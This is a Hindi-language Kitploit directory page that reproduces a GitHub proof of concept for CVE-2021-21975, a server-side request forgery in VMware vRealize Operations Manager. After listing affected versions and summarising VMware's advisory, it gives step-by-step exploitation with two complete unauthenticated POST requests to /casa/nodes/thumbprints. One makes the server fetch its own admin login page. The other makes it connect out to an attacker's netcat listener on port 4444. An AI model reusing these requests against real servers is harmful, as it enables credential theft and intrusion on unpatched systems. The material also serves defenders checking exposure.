Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-21975 — CVE-2021-21975 vRealize Operations Manager SSRF | Kitploit
उपकरण/GitHubGitHub/al1ex/cve-2021-21975
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubal1ex/cve-2021-21975

CVE-2021-21975

CVE-2021-21975 vRealize Operations Manager SSRF

रिपॉजिटरी देखें
137115 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

प्रभावित उत्पाद

  • VMware vRealize Operations 8.3.0、8.2.0、8.1.1、8.1.0、7.5.0
  • VMware Cloud Foundation 4.x、3.x
  • vRealize Suite Lifecycle Manager 8.x

विवरण

31 मार्च, 2021 को, VMware ने आधिकारिक तौर पर vmsa-2021-0004 का जोखिम नोटिस जारी किया। कमजोरी संख्या cve-2021-21975 और cve-2021-21983 हैं। कमजोरी का स्तर उच्च जोखिम है और कमजोरी का स्कोर 8.6 है।

CVE-2021-21975: vRealize Operations Manager API तक नेटवर्क पहुंच वाला एक दुर्भावनापूर्ण अभिनेता प्रशासनिक क्रेडेंशियल चुराने के लिए सर्वर साइड रिक्वेस्ट फोर्जरी (SSRF) हमला कर सकता है।

CVE-2021-21983: vRealize Operations Manager API तक नेटवर्क पहुंच वाला एक प्रमाणित दुर्भावनापूर्ण अभिनेता अंतर्निहित फोटॉन ऑपरेटिंग सिस्टम पर मनमाने स्थानों पर फ़ाइलें लिख सकता है।

कमजोरी

चरण 1: लॉगआउट करें

without_login

चरण 2: इसके बाद, /casa/nodes/thumbprints पर जाएं और burpsuite का उपयोग करके डेटा पैकेट को पकड़ें, ताकि सर्वर अनुरोध करके प्रमाणीकरण पृष्ठ पर लॉगिन करने के लिए निम्नलिखित अनुरोध डेटा पैकेट तैयार किया जा सके

POST /casa/nodes/thumbprints HTTP/1.1
Host: 192.168.203.155
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/json;charset=UTF-8
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 36

["127.0.0.1:443/admin/login.action"]

request

चरण 2: जब SSRF को सत्यापित करने के लिए dnslog का उपयोग किया गया, तो पाया गया कि लंबे समय तक कोई प्रतिध्वनि नहीं आई, और फिर सत्यापन के लिए NC का उपयोग करने के अलावा कोई विकल्प नहीं बचा। निर्माण अनुरोध पैकेट इस प्रकार है:

POST /casa/nodes/thumbprints HTTP/1.1
Host: 192.168.203.155
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/json;charset=UTF-8
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 23

["192.168.202.86:4444"]

request2

संदर्भ

https://kb.vmware.com/s/article/83210

https://www.vmware.com/security/advisories/VMSA-2021-0004.html

https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-21975.yaml

टूल डाउनलोड करें